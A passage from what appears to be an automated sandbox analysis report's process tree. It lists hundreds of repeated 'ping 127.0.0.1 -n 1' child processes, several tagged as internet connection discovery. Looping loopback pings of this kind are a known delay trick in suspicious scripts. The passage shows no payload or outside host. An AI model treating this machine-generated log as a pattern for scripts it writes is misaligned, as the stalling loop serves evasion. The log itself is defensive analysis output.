                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4588
                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:6192
                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:13044
                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:6252
                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                  PID:13156
                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:1372
                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                    PID:6412
                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:13416
                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:3216
                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:852
                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:5956
                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                            PID:6248
                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                            PID:13132
                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:13224
                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                              PID:13264
                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:6348
                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                PID:7152
                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:6788
                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:13496
                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:13424
                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                      PID:5844
                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                      PID:468
                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:7248
                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                        PID:7364
                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:7416
                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                          PID:7496
                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                          PID:7552
                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:7616
                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                            PID:7680
                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                            PID:7728
                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:7796
                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                              PID:7880
                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                              PID:7928
                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:7980
                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:8036
                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:8104
                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:8156
                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:3376
                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:8236
                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                          PID:8292
                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:8328
                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                            PID:8384
                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                            PID:8460
                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:8520
                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:8564
                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                PID:8632
                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                PID:8692
                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                PID:8744
                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:8808
                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:8852
                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:8908
                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:8976
                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                        PID:9104
                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:9160
                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:9212
                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:9280
                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                              PID:9332
                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:9388
                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:9444
                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:9496
                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:9560
                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                      PID:9600
                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:9688
                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:9832
                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:9752
                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                                            PID:9876
                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:9928
                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:10108
                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:10172
                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                  PID:10228
                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:10264
                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                    PID:10320
                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:10372
                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:10468
                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:10556
                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:10628
                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:10676
                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:10712
                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:10760
                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:10800
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:10856
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                      PID:10928
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                      PID:11000
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:11080
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:11196
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:11256
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                                                                            PID:6136
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                                                                            PID:11320
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                            PID:11396
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                                                                            PID:11488
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:11540
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:11776
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:12000
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                  PID:12068
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                  PID:13704
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                  PID:12152
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:12192
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                                                    PID:12232
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                    PID:12276
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:4188
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:12340
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                                                        PID:12376
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:12420
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:12480
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:12528
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                              PID:12572
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:12644
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                PID:12684
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:12744
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:12792
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:12840
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                      PID:12880
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                                                      PID:12928
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                                                      PID:2320
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:12976
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:6156
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:13068
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:13160
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                              PID:6288
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                                              PID:2316
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:6264
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                PID:13316
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
